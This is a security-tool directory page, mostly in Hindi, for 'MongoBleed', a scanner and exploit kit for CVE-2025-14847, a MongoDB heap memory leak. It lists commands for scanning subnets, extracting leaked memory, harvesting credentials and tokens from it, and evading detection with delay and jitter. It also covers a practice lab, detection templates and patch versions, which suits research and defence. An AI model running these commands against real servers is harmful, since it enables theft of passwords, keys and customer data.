Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
MongoBleed — CVE-2025-14847 (MongoBleed) स्कैनर और एक्सप्लॉइट टूल। zlib डीकंप्रेशन के माध्यम से अनप्रमाणित MongoDB हीप मेमोरी लीक। डिटेक्शन, मेमोरी निष्कर्षण, क्रेडेंशियल पार्सिंग, CIDR/बैच स्कैनिंग, Nuclei टेम्पलेट और CTF लैब शामिल। | Kitploit
उपकरण/GitHubGitHub/sho-luv/mongobleed
भेद्यता स्कैनरमेमोरी फोरेंसिकनेटवर्क मैपिंगशोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाडेटाबेस सुरक्षालैब और अभ्यास
GitHubsho-luv/mongobleed

MongoBleed

CVE-2025-14847 (MongoBleed) स्कैनर और एक्सप्लॉइट टूल। zlib डीकंप्रेशन के माध्यम से अनप्रमाणित MongoDB हीप मेमोरी लीक। डिटेक्शन, मेमोरी निष्कर्षण, क्रेडेंशियल पार्सिंग, CIDR/बैच स्कैनिंग, Nuclei टेम्पलेट और CTF लैब शामिल।

26 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

MongoBleed

CVE-2025-14847 स्कैनर और एक्सप्लॉइटेशन टूलकिट

MongoBleed के लिए एक सुरक्षा अनुसंधान टूलकिट -- MongoDB के zlib डीकंप्रेसन में एक गंभीर बिना प्रमाणीकरण वाला मेमोरी लीक, जो हमलावरों को बिना प्रमाणीकरण के सर्वर हीप मेमोरी से संवेदनशील डेटा निकालने की अनुमति देता है।

root@kitploit:~
╔╦╗┌─┐┌┐┌┌─┐┌─┐╔╗ ┬  ┌─┐┌─┐┌┬┐
║║║│ │││││ ┬│ │╠╩╗│  ├┤ ├┤  ││
╩ ╩└─┘┘└┘└─┘└─┘╚═╝┴─┘└─┘└─┘─┴┘
CVE-2025-14847 Scanner & Exploit

क्विक स्टार्ट

root@kitploit:~
# No external dependencies -- Python 3 standard library only
cd cli

# Detect if a target is vulnerable (default action)
python mongobleed.py -t localhost:27017

# Scan an entire subnet
python mongobleed.py -t 192.168.1.0/24

# Extract memory and parse for credentials
python mongobleed.py -t target:27017 -e --credentials

# Safe mode -- detection only, no exploitation
python mongobleed.py -t target:27017 -s

रिपॉज़िटरी संरचना

root@kitploit:~
MongoBleed/
├── cli/                          # Command-line scanner and exploitation tool
│   ├── mongobleed.py             # Main CLI tool
│   ├── requirements.txt          # Python dependencies (stdlib only)
│   └── README.md                 # CLI documentation
├── lab/                          # Docker-based CTF lab environment
│   ├── docker-compose.yml        # Multi-container lab setup
│   ├── vulnerable/               # Vulnerable MongoDB configurations
│   ├── patched/                  # Patched MongoDB for comparison
│   ├── no-zlib/                  # Non-exploitable (zlib disabled)
│   ├── monitoring/               # Attack visualization dashboard
│   ├── warmup-heap.sh            # Populate heap with sensitive data
│   └── README.md                 # Lab setup instructions
├── nuclei/                       # Nuclei scanning templates
│   ├── CVE-2025-14847.yaml       # Active exploitation template
│   ├── CVE-2025-14847-safe.yaml  # Safe detection template
│   └── README.md                 # Nuclei template docs
├── docs/                         # Educational documentation
│   ├── README.md                 # Learning path index
│   ├── 01-fundamentals.md        # MongoDB & memory basics
│   ├── 02-vulnerability.md       # CVE-2025-14847 deep dive
│   ├── 03-exploitation.md        # Hands-on exploitation
│   ├── 04-detection.md           # Hunting and detection
│   └── 05-defense.md             # Mitigation strategies
└── README.md                     # This file

फ़ीचर्स

CLI टूल

  • वर्ज़न फ़िंगरप्रिंटिंग और कंप्रेशन डिटेक्शन (zlib/snappy/zstd)
  • सुरक्षित मोड विकल्प के साथ भेद्यता डिटेक्शन
  • ऑफ़सेट स्कैनिंग के माध्यम से मेमोरी निष्कर्षण (कॉन्फ़िगर करने योग्य रेंज)
  • क्रेडेंशियल पैटर्न डिटेक्शन (16 पैटर्न: पासवर्ड, API कुंजियाँ, JWT, AWS कुंजियाँ, MongoDB URI, आदि)
  • CIDR नोटेशन समर्थन (192.168.1.0/24, 10.0.0.0/16:27018)
  • मल्टी-थ्रेडिंग के साथ टार्गेट फ़ाइलों से बैच स्कैनिंग
  • निरंतर निष्कर्षण मोड
  • हेक्सडंप और प्रिंट करने योग्य स्ट्रिंग निष्कर्षण
  • JSON आउटपुट और फ़ाइल एक्सपोर्ट
  • एवेज़न नियंत्रण (delay, jitter)
  • रंगीन टर्मिनल आउटपुट

लैब वातावरण

  • कई भेद्य MongoDB वर्ज़न (4.4.29, 6.0.26, 8.0.16)
  • तुलना के लिए पैच किया गया वर्ज़न (8.0.17)
  • मिटिगेशन प्रदर्शित करने वाला नो-zlib वर्ज़न
  • यथार्थवादी संवेदनशील डेटा के साथ प्री-सीडेड
  • सीखने के लिए CTF-शैली फ़्लैग
  • अटैक विज़ुअलाइज़ेशन के साथ मॉनिटरिंग डैशबोर्ड
  • विश्वसनीय एक्सप्लॉइटेशन डेमो के लिए हीप वार्मअप स्क्रिप्ट

Nuclei टेम्पलेट

  • सुरक्षित डिटेक्शन टेम्पलेट (केवल वर्ज़न + कंप्रेशन जाँच)
  • सक्रिय एक्सप्लॉइटेशन टेम्पलेट (वर्ज़न + zlib पुष्टि)

उपयोग

डिटेक्शन

root@kitploit:~
# Check single target
python mongobleed.py -t localhost:27017

# Check with verbose output
python mongobleed.py -t localhost:27017 -v

# Safe mode -- detection only, never sends exploit payload
python mongobleed.py -t localhost:27017 -s

# Show version info
python mongobleed.py -t localhost:27017 --version

नेटवर्क स्कैनिंग

root@kitploit:~
# Scan a /24 subnet
python mongobleed.py -t 192.168.1.0/24

# CIDR with custom port
python mongobleed.py -t 10.0.0.0/24:27018

# Scan from target file (CIDR ranges in file are expanded)
python mongobleed.py -T targets.txt -j 20 -o results.json

# Target file can contain IPs, host:port, and CIDR ranges
cat targets.txt
# 192.168.1.100:27017
# 10.0.0.0/24
# mongodb.internal:27017

मेमोरी निष्कर्षण

root@kitploit:~
# Extract memory (default offset range 20-8192)
python mongobleed.py -t target:27017 -e

# Custom offset range
python mongobleed.py -t target:27017 -e --min-offset 20 --max-offset 500

# Continuous extraction (Ctrl+C to stop)
python mongobleed.py -t target:27017 --continuous

# Force extraction even if version check is inconclusive
python mongobleed.py -t target:27017 -e --force

विश्लेषण

root@kitploit:~
# Parse leaked memory for credentials and secrets
python mongobleed.py -t target:27017 -e --credentials

# Parse for tokens specifically
python mongobleed.py -t target:27017 -e --tokens

# Extract printable strings
python mongobleed.py -t target:27017 -e --strings

# Hexdump output
python mongobleed.py -t target:27017 -e --hexdump

एवेज़न

root@kitploit:~
# Add delay between requests (milliseconds)
python mongobleed.py -t target:27017 -e --delay 500

# Random jitter on delay
python mongobleed.py -t target:27017 -e --delay 1000 --jitter

Nuclei टेम्पलेट

root@kitploit:~
# Safe detection only
nuclei -t nuclei/CVE-2025-14847-safe.yaml -u mongodb://localhost:27017

# Active detection
nuclei -t nuclei/CVE-2025-14847.yaml -u mongodb://localhost:27017

# Scan multiple targets
nuclei -t nuclei/ -l targets.txt

लैब वातावरण

root@kitploit:~
# Start all containers
cd lab && docker compose up -d

# Services:
# - localhost:27017  MongoDB 4.4.29 (Vulnerable + zlib)
# - localhost:27018  MongoDB 6.0.26 (Vulnerable + zlib)
# - localhost:27019  MongoDB 8.0.16 (Vulnerable + zlib)
# - localhost:27020  MongoDB 8.0.17 (Patched)
# - localhost:27021  MongoDB 8.0.16 (No zlib - not exploitable)
# - localhost:8080   Monitoring Dashboard

# Warm up heap with sensitive data before exploitation
./warmup-heap.sh 27017 50

# Run exploit against lab
cd ../cli
python mongobleed.py -t localhost:27017 -e --credentials

CLI विकल्प

root@kitploit:~
Target:
  -t, --target TARGET     Target host:port or CIDR range (e.g. 192.168.1.0/24)
  -T, --targets FILE      File with target list (supports CIDR per line)

Detection:
  --detect                Detect if target is vulnerable (default action)
  --version               Show MongoDB version
  -s, --safe              Safe mode - detection only, no exploitation

Exploitation:
  -e, --extract           Extract memory via offset scanning
  --min-offset N          Minimum offset to probe (default: 20)
  --max-offset N          Maximum offset to probe (default: 8192)
  --continuous            Continuous extraction mode
  --force                 Force extraction even if version check fails

Analysis:
  --credentials           Parse for credentials
  --tokens                Parse for tokens
  --strings               Extract printable strings
  --hexdump               Display hexdump

Evasion:
  --delay MS              Delay between requests (milliseconds)
  --jitter                Random delay jitter

Output:
  -o, --output FILE       Output file (JSON)
  -v, --verbose           Verbose output
  -q, --quiet             Quiet mode
  --json                  JSON output
  --no-color              Disable colors

Connection:
  --timeout SECS          Connection timeout (default: 10)
  -j, --threads N         Threads for batch scanning (default: 10)

क्रेडेंशियल डिटेक्शन पैटर्न

यह टूल निकाली गई मेमोरी में निम्नलिखित पैटर्न खोजता है:

CVE-2025-14847 विवरण

प्रभावित वर्ज़न

यह कैसे काम करता है

MongoBleed, MongoDB के zlib मैसेज डीकंप्रेसन (message_compressor_zlib.cpp) में एक खामी का शोषण करता है। भेद्य कोड वास्तविक डीकंप्रेस्ड लंबाई के बजाय आवंटित बफ़र आकार लौटाता है, जिससे हमलावर अनइनिशियलाइज़्ड हीप मेमोरी पढ़ सकते हैं।

root@kitploit:~
1. CONNECT (no authentication required)
              ↓
2. SEND MALFORMED OP_COMPRESSED
   ┌──────────────────────────────────┐
   │ originalOpcode: OP_MSG (2013)    │
   │ uncompressedSize: INFLATED       │ ← Bug trigger
   │ compressorId: zlib (2)           │
   │ compressedMessage: [small data]  │
   └──────────────────────────────────┘
              ↓
3. SERVER ALLOCATES OVERSIZED BUFFER
   [ small real data | uninitialized heap memory ]
              ↓
4. BSON PARSER READS INTO HEAP GARBAGE
   Inflated document length causes parser to read
   beyond actual data into heap memory
              ↓
5. ERROR RESPONSE LEAKS MEMORY
   "invalid BSON field name 'password=secret123...'"

क्या लीक हो सकता है

  • डेटाबेस क्रेडेंशियल और पासवर्ड
  • API कुंजियाँ और टोकन
  • सत्र टोकन और JWT
  • MongoDB कनेक्शन स्ट्रिंग
  • मेमोरी से एप्लिकेशन सीक्रेट
  • हाल की क्वेरीज़ से ग्राहक PII
  • आंतरिक कॉन्फ़िगरेशन डेटा

क्रेडिट्स

  • Joe Desimone (Elastic Security) - मूल PoC और भेद्यता नामकरण
  • MongoDB Security Team - पैच विकास
  • Wiz Research - वास्तविक दुनिया में शोषण विश्लेषण
  • Eric Capuano - डिटेक्शन सिग्नेचर और Velociraptor आर्टिफैक्ट

संदर्भ

  • MongoDB Security Advisory
  • Wiz Blog - MongoBleed Analysis
  • Hunting MongoBleed - Eric Capuano
  • Original PoC - joe-desimone/mongobleed
  • NVD - CVE-2025-14847

अस्वीकरण

यह टूलकिट केवल अधिकृत सुरक्षा परीक्षण, अनुसंधान और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। केवल उन प्रणालियों के विरुद्ध उपयोग करें जिनके स्वामी आप हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है।

लाइसेंस

MIT License

टूल डाउनलोड करें
प्रकारउदाहरण पैटर्न
passwordpassword: value, passwd=value
secretsecret: value
api_keyapi_key: sk_live_...
tokentoken: ... (16+ वर्ण)
bearer_tokenBearer eyJ...
jwteyJ... (Base64 JWT)
mongodb_urimongodb://user:pass@host
postgres_uripostgresql://...
redis_uriredis://...
stripe_keysk_live_...
openai_keysk-... (48+ वर्ण)
aws_access_keyAKIA...
github_tokenghp_...
slack_tokenxoxb-..., xoxp-...
ctf_flagFLAG{...}
आइटममान
CVECVE-2025-14847
नामMongoBleed
CWECWE-130 (लंबाई पैरामीटर का अनुचित प्रबंधन)
CVSS8.7 (उच्च)
प्रकारबिना प्रमाणीकरण वाला मेमोरी लीक
खुलासा19 दिसंबर, 2025
ITW में शोषण29 दिसंबर, 2025
शाखाभेद्यपैच किया गया
8.2.x8.2.0 - 8.2.28.2.3
8.0.x8.0.0 - 8.0.168.0.17
7.0.x7.0.0 - 7.0.277.0.28
6.0.x6.0.0 - 6.0.266.0.27
5.0.x5.0.0 - 5.0.315.0.32
4.4.x4.4.0 - 4.4.294.4.30
4.2.xसभी वर्ज़नEOL - कोई पैच नहीं
4.0.xसभी वर्ज़नEOL - कोई पैच नहीं
3.6.xसभी वर्ज़नEOL - कोई पैच नहीं